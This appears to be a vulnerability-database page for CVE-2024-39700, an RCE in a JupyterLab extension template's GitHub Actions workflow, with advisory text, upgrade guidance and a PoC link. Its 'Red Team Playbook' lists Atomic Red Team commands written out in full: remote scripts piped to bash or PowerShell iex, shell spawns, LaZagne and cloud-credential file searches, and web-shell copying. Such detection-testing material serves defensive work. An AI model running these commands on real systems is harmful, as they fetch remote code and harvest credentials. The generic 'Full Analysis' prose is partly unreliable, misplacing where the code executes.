CVE-2024-39700
Overview
The vulnerability is a remote code execution (RCE) flaw rooted in improper handling of the GitHub Actions workflow file `update-integration-tests.yml` included in repositories generated by the jupyterlab extension-template with the `test` option enabled. The flaw arises from unsafe execution of code within this workflow, allowing malicious input to be executed on the GitHub Actions runner environment. This affects the continuous integration feature embedded in the template's GitHub Actions configuration.
Vulnerability Description
JupyterLab extension template is a `copier` template for JupyterLab extensions. Repositories created using this template with `test` option include `update-integration-tests.yml` workflow which has an RCE vulnerability. Extension authors hosting their code on GitHub are urged to upgrade the template to the latest version. Users who made changes to `update-integration-tests.yml`, accept overwriting of this file and re-apply your changes later. Users may wish to temporarily disable GitHub Actions while working on the upgrade. We recommend rebasing all open pull requests from untrusted users as actions may run using the version from the `main` branch at the time when the pull request was created. Users who are upgrading from template version prior to 4.3.0 may wish to leave out proposed changes to the release workflow for now as it requires additional configuration.
Impact
An attacker with the ability to submit pull requests to a repository created from the vulnerable template can execute arbitrary code on the GitHub Actions runner, potentially compromising the CI environment and any connected resources. No user interaction beyond PR submission is required, and the vulnerability leverages the network-exposed GitHub Actions environment (AV:N/AC:L/PR:L/UI:N). This can lead to unauthorized code execution, data exposure, or disruption of the CI pipeline, impacting the integrity and confidentiality of the development process.
Solution
Users should upgrade the jupyterlab extension-template to version 4.3.0 or later, as detailed in the GitHub advisory GHSA-45gq-v5wm-82wg (https://github.com/jupyterlab/extension-template/security/advisories/GHSA-45gq-v5wm-82wg). During upgrade, accept overwriting of the `update-integration-tests.yml` workflow file and re-apply any custom changes afterward. Temporarily disabling GitHub Actions during the upgrade process is recommended. Additionally, rebase all open pull requests from untrusted contributors to ensure workflows run updated, secure versions.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with the JupyterLab extension template arises from a flaw in the `update-integration-tests.yml` workflow, which is included in repositories created using the `copier` template with the `test` option. This flaw allows for remote code execution (RCE), enabling an attacker to execute arbitrary commands on the server where the JupyterLab instance is hosted. The root cause of this vulnerability lies in the improper handling of user inputs and the lack of adequate security measures in the GitHub Actions workflow. When an extension author utilizes this template, they inadvertently introduce a significant security risk into their projects, especially if they do not update to the latest version of the template.
Attack vectors for this vulnerability primarily involve the exploitation of GitHub Actions within the JupyterLab extension development process. An attacker could create a malicious pull request that leverages the vulnerable `update-integration-tests.yml` file. If this pull request is merged without proper scrutiny, the malicious code could be executed in the context of the repository's GitHub Actions, potentially leading to unauthorized access to sensitive data or control over the server. Furthermore, if the repository is public or if the extension is widely used, the impact could extend beyond the immediate target, affecting numerous users and systems that rely on the compromised extension.
The real-world impact of this vulnerability is substantial, particularly for organizations that utilize JupyterLab for data analysis, research, or development. The ability to execute arbitrary code remotely poses a critical business risk, as it could lead to data breaches, loss of intellectual property, and damage to the organization's reputation. Additionally, the potential for cascading effects, where compromised extensions affect multiple users or systems, amplifies the risk. Organizations must recognize that the consequences of such vulnerabilities can extend beyond immediate financial losses, potentially leading to regulatory scrutiny and loss of customer trust.
To detect and mitigate this vulnerability, organizations should adopt a proactive approach to security within their development processes. First, it is essential to regularly audit and update JupyterLab extensions to ensure that they are using the latest version of the template. Extension authors should be encouraged to review their workflows, particularly the `update-integration-tests.yml` file, and implement security best practices, such as validating inputs and limiting the execution context of GitHub Actions. Additionally, temporarily disabling GitHub Actions during the upgrade process can help prevent exploitation while changes are being made. Organizations should also implement a robust code review process for pull requests, especially those from untrusted users, to minimize the risk of introducing malicious code.
In conclusion, the vulnerability present in the JupyterLab extension template represents a significant threat to the security of applications built on this platform. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves to defend against such vulnerabilities. Through diligent detection and mitigation strategies, including regular updates, code reviews, and security best practices, the risks associated with this vulnerability can be effectively managed, safeguarding both the integrity of the development process and the security of the systems that rely on JupyterLab.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Jupyter | Jupyterlab | All |
cpe:2.3:a:jupyter:jupyterlab:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
LOURC0D3/CVE-2024-39700-PoC
CVE-2024-39700 Proof of Concept
|
LOURC0D3 | 1 | 0 | 2024-07-29 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-39700 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/jupyterlab/extension-template/security/advisories/GHSA-45gq-v5wm-82wg |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/jupyterlab/extension-template/commit/035e78c1c65bcedee97c95bb683abe59c96bc4e6 |